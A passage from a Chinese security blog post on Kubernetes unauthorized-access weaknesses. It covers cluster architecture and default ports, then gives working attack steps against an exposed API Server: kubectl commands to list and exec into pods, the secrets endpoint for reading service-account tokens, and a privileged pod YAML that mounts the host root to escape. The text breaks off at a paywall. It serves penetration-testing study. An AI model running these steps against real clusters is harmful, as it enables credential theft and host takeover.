云安全之k8s未授权漏洞总结

云安全:K8s未授权漏洞全解析
原创 已于 2025-04-07 16:26:22 修改 · 2.4k 阅读 · 25 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#kubernetes #容器 #云原生

于 2025-03-27 16:37:15 首次发布

一、k8s介绍

在这里插入图片描述
全称是 kubernetes,是谷歌在2014年推出的一种开源容器编排系统,后来捐赠给了云原生计算基金会(CNCF)。因将k后面的8个字母进行缩写后,被广泛简称为K8s。随着容器技术的发展,面临着容器数量庞大、难以管理的问题,K8s的推出很好的解决了这一问题,并且在容器编排系统中占据领先地位。

Kubernetes 的名字来源于希腊语,意为“舵手”或“领航员”,寓意着它在容器编排领域如同舵手一般,引领着容器化应用的运行(docker的logo是一个运输船)。

Master 节点:

Master节点是 Kubernetes 集群的控制节点,每个 Kubernetes 集群里至少有一个Master节点,它负责整个集群的决策(如调度),发现和响应集群的事件,是 Kubernetes 集群的“大脑”。Master节点可以运行在集群中的任意一个节点上,但是最好将Master节点作为一个独立节点,不在该节点上创建容器,因为如果该节点出现问题导致宕机或不可用,整个集群的管理就会失效。

在Master节点上,通常会运行以下服务:

  • API Server(kube-apiserver)
    提供 HTTP Rest 接口,处理所有资源的增、删、改、查等操作,是集群控制的入口。
  • etcd
    分布式的键值存储系统,用于保存集群的配置数据和状态信息。
  • Scheduler(kube-scheduler)
    调度器,负责将新创建的 Pod 调度到合适的工作节点上运行,基于资源需求、约束条件等进行调度。
  • Controller Manager(kube-controller-manager)
    控制和管理器,运行多个控制器进程,如节点控制器、复制控制器等,确保集群状态符合期望状态。
Node 节点:

Node节点是Kubernetes集群的工作节点,每个集群中至少需要一台Node节点,它负责真正的运行Pod,当某个Node节点出现问题而导致宕机时,Master会自动将该节点上的Pod调度到其他节点。Node节点可以运行在物理机上,也可以运行在虚拟机中。

在Node节点上,通常会运行以下服务:

  • kubelet
    运行在每一个 Node 节点上的客户端,负责Pod对应的容器创建,启动和停止等任务,同时和Master节点进行通信,实现集群管理的基本功能。
  • kube-proxy
    实现 Kubernetes 服务(Service)的网络代理,负责负载均衡和网络通信。
  • container runtime
    负责运行和管理容器,常见的容器运行时有 Docker、containerd 等。
Pod:

是 Kubernetes 中最小的部署和调度单元。一个 Pod 可以包含一个或多个紧密相关的容器,这些容器共享网络(同一 IP 地址)和存储资源。Pod 设计为临时的,若其中的容器异常退出,Kubernetes 可以通过控制器自动重建它们。

一句话总结:
  • Master:管事的(决策者)
  • Node:干活的(执行者)
  • Pod:干活的工具包(运行单元)

在这里插入图片描述

二、组件接口存在的风险

k8s 中的大多数组件以 HTTP 和 HTTPS 的 API 形式提供服务,常见端口如下:

组件 默认端口 说明
API Server 6443 基于 HTTP 的安全端口
API Server 8080 不安全的 HTTP 端口
Kubelet 10248 检查健康状态的端口
Kubelet 10250 面向 API Server 提供服务的 HTTPS 端口
Kubelet 10255 提供了pod和node的信息,接口以只读形式暴露出去,访问该端口不需要认证和鉴权
Dashboard 8001 提供 HTTP 服务的端口
etcd 2379 客户端与服务端之间通信的端口
etcd 2380 不同服务端之间通信的端口

API Server 未授权访问

默认情况下,Kubernetes API Server 在两个端口提供服务:8080 和 6443

8080: insecure-port #以 HTTP 提供服务,无认证和授权机制,
6443: secure-port #以 HTTPS 提供服务,支持认证和授权服务。

如果配置不当,8080 和 6443端口都会存在未授权访问漏洞,只要网络可达,攻击者就能够通过这两个端口操控集群。

8080端口未授权访问

在较新版本的 Kubernetes 中,8080 端口的 HTTP 服务默认不启动,需要我们手动开启。

vim /etc/kubernetes/manifests/kube-apiserver.yaml

在这里插入图片描述
这里设置为0表示关闭,甚至在高版本的k8s中,直接将--insecure-port这个配置删除了,需要手动添加。

这里将修改为8080,并添加配置

- --insecure-port=8080
- --insecure-bind-address=0.0.0.0

systemctl restart kubelet

访问 8080 端口即可看到存在未授权。
在这里插入图片描述

通过 kubectl -s 命令,查看node节点信息以及pod信息

kubectl -s ip:8080 get node
kubectl -s ip:8080:8080 get pod

在这里插入图片描述
执行命令

kubectl -s 127.0.0.1:8080 --namespace=default exec -it nginxfromuzju-59595f6ffc-p8xvk bash

在这里插入图片描述

在高版本的k8s中,这种方法是不行的,连不上去

获取 service-account-token

/api/v1/namespaces/kube-system/secrets/

在这里插入图片描述
建立特权 Pod,进行逃逸
本地创建 test.yaml 文件,内容如下:

apiVersion: v1
kind: Pod
metadata:
  name: nginx-deployment
spec:
  containers:
  - image: nginx:1.8
    name: container
    volumeMounts:
    - mountPath: /mnt
      name: test
  volumes:
  - name: test
    hostPath:
      path: /

kubect -s https://your-ip:6443/ apply -f test.yaml
最低0.47元/天 解锁文章
渗透测试:k8s的3种攻击手段(Kubernetes未授权漏洞,端口:8080、6443、10250)
墨痕诉清风的博客
09-08 1万+
本文从k8s api-server 8080端口未授权访问、kubelet 10250端口未授权访问、rbac权限三方面不安全配置,介绍了渗透k8s集群的方法。渗透集群手法还有很多种,后文再表。
红队攻防渗透技术实战流程:云安全云原生安全:K8s安全etcd Dashboard Configfile漏洞
HACKONE的博客
05-22 706
第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert进行认证访问,一般配合ssrf或其他利用,较为鸡肋。etcd是master节点的数据库,通过未授权获取token和证书来攻击,etcd的端口是2379:默认通过证书认证,主要存放节点的数据,如一些token和证书。第三种:实战中在安装k8s默认的配置2379只会监听本地,如果访问没设置0.0.0.0暴露,那么也就意味着最多就是本地访问,不能公网访问,只能配合ssrf或其他。
扒一扒过去一年K8S高危漏洞都有哪些?
力哥讲技术
03-13 1906
在过去的一年里,Kubernetes继续稳固其在关键基础设施领域的地位,成为无论是小型还是大型组织都广受欢迎的选择。然而,随着更多开发人员将Kubernetes部署与其他云原生组件相结合,构建出更加完善的工作系统时,这也使得Kubernetes更容易遭受攻击。更多的组件和更加复杂的基础架构也增加了易受攻击的范围,这是需要我们运维人员关注的。根据 Red Hat 的2022 年 Kubernetes 安全状况报告:https://www.redhat.com/rhdc/managed-files/cl-sta
小迪安全v2023学习笔记(九十七天)—— 云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行
最新发布
lingggggaaaa的博客
10-06 1242
本文主要围绕KubernetesK8s)安全配置错误导致的未授权访问问题展开。首先介绍了K8s的基本架构,包括Master节点(包含API Server、etcd等核心组件)和Node节点(运行kubelet、kube-proxy等服务)。文章重点分析了K8s安全威胁,涵盖内外部访问安全、组件安全、容器安全等12个攻击面。针对kubelet未授权访问漏洞,详细演示了当配置authentication.anonymous.enabled=true和authorization.mode=AlwaysAllow
K8S安全风险及防护建议
ZAWX_NETSTARSEC的博客
07-17 1197
例如,攻击者可以创建一个特权容器,该容器可以访问宿主机上的资源,并在该容器内执行命令,从而使其获得更高的权限。事中,通过融合图计算、身份欺骗等技术,对K8S进行全方位的监测,及时发现针对K8S漏洞利用、身份窃取等风险,在遭受攻击的第一时间及时发现攻击者,对攻击行为进行阻断。比如攻击者可通过容器中运行的SSH服务执行命令,如果攻击者通过暴力破解或者其他方法获得了容器的有效凭证,他们就可以通过SSH获得对容器的远程访问。但同时,K8S也因其高度复杂的架构和众多组件,成为了攻击者攻击的目标之一。
云安全K8S API Server 未授权访问
王嘟嘟的博客
10-30 2928
通常情况下k8s会有两个API服务,一个是8080,还有一个是6443。6443提供https服务,并且不对外开放,支持认证和授权服务,默认情况下8080是不启动的。
K8s下的未授权及利用
wintercc1219的博客
02-04 3119
K8s下的未授权及利用,API Server 8080/6443 未授权访问漏洞复现,kubelet 10250 端口未授权
云原生安全攻防》-- K8s攻击案例:组件未授权访问导致集群入侵
08-27 944
在本节课程中,我们将一起探讨K8s组件未授权访问导致集群入侵的攻击案例。K8s的组件的配置不安全,就有可能存在未授权访问的安全风险。如果攻击者能够成功进行未授权访问,就有可能导致整个集群节点遭受入侵。在这个课程中,我们将学习以下内容:K8s组件未授权访问:常见的K8s组件未授权访问漏洞介绍。K8s组件未授权攻击案例:深入分析K8s组件未授权访问的攻击案例。我们将重点介绍以下几个常见的组件未授权访问...
红队攻防渗透技术实战流程:云安全云原生安全:K8s搭建及节点漏洞利用
HACKONE的博客
05-21 986
Kubernetes是一个开源的,用于编排云平台中多个主机上的容器化的应用,目标是让部署容器化的应用能简单并且高效的使用, 提供了应用部署,规划,更新,维护的一种机制。其核心的特点就是能够自主的管理容器来保证云平台中的容器按照用户的期望状态运行着,管理员可以加载一个微型服务,让规划器来找到合适的位置,同时,Kubernetes在系统提升工具以及人性化方面,让用户能够方便的部署自己的应用。随着越来越多企业开始上云的步伐,在攻防演练中常常碰到云相关的场景,例:公有云、私有云、混合云、虚拟化集群等。
红队攻防渗透技术实战流程:云安全云原生安全:K8s污点横向移动
HACKONE的博客
05-22 635
污点是K8s高级调度的特性,用于限制哪些Pod可以被调度到某一个节点,一般主节点包含一个污点,是k8s集群默认给master节点加的Taints(污点)这个污点是阻止Pod调度到主节点上面,除非有Pod能容忍这个污点,而通常容忍这个污点的Pod都是系统级别的Pod,例如:kube-system。攻击者在获取到node节点的权限后,可以通过kubectl来创建一个能够容忍master主节点的污点的Pod,当该Pod被成功创建到Master上之后,攻击者可以通过在子节点上操作该Pod实现对主节点的控制。
K8s爆严重安全漏洞?有何应对措施与建议
weixin_30670965的博客
12-05 399
Kubernetes最近爆出严重安全漏洞,影响几乎目前所有的版本。实际影响究竟多大?老版本用户是否必须升级?以下是华为云容器服务团队对该漏洞的分析解读。 Kubernetes爆出的严重安全漏洞: 攻击者通过构造特殊请求,可以在一个普通权限的链接上提升权限,向被代理的后端服务器发送任意请求。 该问题影响了几乎Kubernetes目前所有的版本,包括: Ku...
KubernetesK8s)相关漏洞介绍
weixin_45945976的博客
10-31 1236
Kubernetes Image Builder通过Proxmox Provider构建的VM镜像中存在默认凭证漏洞(SSH账户builder/builder),由于这些默认凭证未在镜像构建完成后被修改或禁用,导致未授权攻击者可以利用它们通过SSH连接到使用受影响镜像的虚拟机,从而获得对目标节点的访问权限。这些只是一部分已知的Kubernetes安全漏洞,实际的安全风险可能更多,因此,定期更新和打补丁、遵循最佳实践进行安全管理是非常重要的。:集群内部的服务间通信如果没有充分加密,可能导致数据泄露。
k8s安全测评漏洞:SSL/TLS协议信息泄露漏洞(CVE-2016-2183)
Yang_RR的博客
05-09 2287
k8s组件使用了IDEA、DES和3DES等算法,修改配置文件禁用上述算法即可。
云安全云原生- K8S Kubelet 未授权访问
仇辉攻防的博客
02-13 1590
K8S中的kubelet是一个运行在每个工作节点上的核心组件,它负责管理Node(节点)上的容器生命周期、资源管理、镜像拉取、节点注册、Pod监控和报告、安全性控制以及日志和指标收集,协作容器运行时,以确保容器在节点上正确运行,从而实现容器编排和自动化容器管理。1、与 API Server 交互Kubelet 通过 Kubernetes API Server 获取分配给该节点的 Pod 任务,并报告 Pod 和节点的运行状态。2、Pod 管理负责管理节点上的 Pod,确保 Pod 中的容器按期望运行。
K8S中部署的Kuboard修复swagger未授权访问漏洞
a492391142的博客
07-12 1242
在kuboard-v3.yaml文件下ConfigMap部分的data模块下新增"KUBOARD_DISABLE_SWAGGER: ‘true’"参数后重启Kuboard以关闭swagger。:因未授权访问swagger,攻击者可获取文件读取相关的接口,可能存在任意文件下载,相关的业务访问可能存在未授权访问等问题。
K8s攻击案例:组件未授权访问导致集群入侵
12-25 9029
K8s集群往往会因为组件的不安全配置存在未授权访问的情况,如果攻击者能够进行未授权访问,可能导致集群节点遭受入侵。比较常见的的组件未授权访问漏洞,主要包括 API Server 未授权访问、kubelet 未授权访问、etcd 未授权访问、kube-proxy 不安全配置、Dashboard未授权访问。接下来,我们将对这几个未授权访问的攻击场景和攻击过程进行详细的分析。01、 API Server...
K8S新安全漏洞的应对之策:API Server拒绝服务漏洞
weixin_34187822的博客
03-08 235
CVE-2019-1002100漏洞美国当地时间2019年3月2日,Kubernetes社区发布了Kubernetes API server拒绝服务的漏洞(CVE-2019-1002100),即有API写入权限的用户在写入资源时会导致Kubernetes API server过度消耗资源,此漏洞被评级为【中等严重性】。此漏洞表现为用户在向Kubernetes API ser...
【独家】K8S漏洞报告 | 近期bug fix解读
weixin_30929011的博客
04-19 238
安全漏洞CVE-2019-3874分析 Kubernetes近期重要bug fix分析 Kubernetes v1.13.5 bug fix数据分析 ——本周更新内容 安全漏洞CVE-2019-3874分析 3月21日,Kubernetes社区通过Google Group频道Kubernetes developer/contributor discussion发布了安全漏洞C...
Kubernetes Api Server未授权访问漏洞
weixin_71053667的博客
08-05 605
Kubernetes 的服务在正常启动后会开启两个端口:Localhost Port (默认8080)、Secure Port (默认6443)。这两个端口都是提供 Api Server 服务的,一个可以直接通过 Web 访问,另一个可以通过 kubectl 客户端进行调用。如果运维人员没有合理的配置验证和权限,那么攻击者就可以通过这两个接口去获取容器的权限。步骤二:在打开的网页中直接访问 8080 端口会返回可用的 API 列表。步骤一:使用以下Fofa语法搜索Kubernetes产品。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值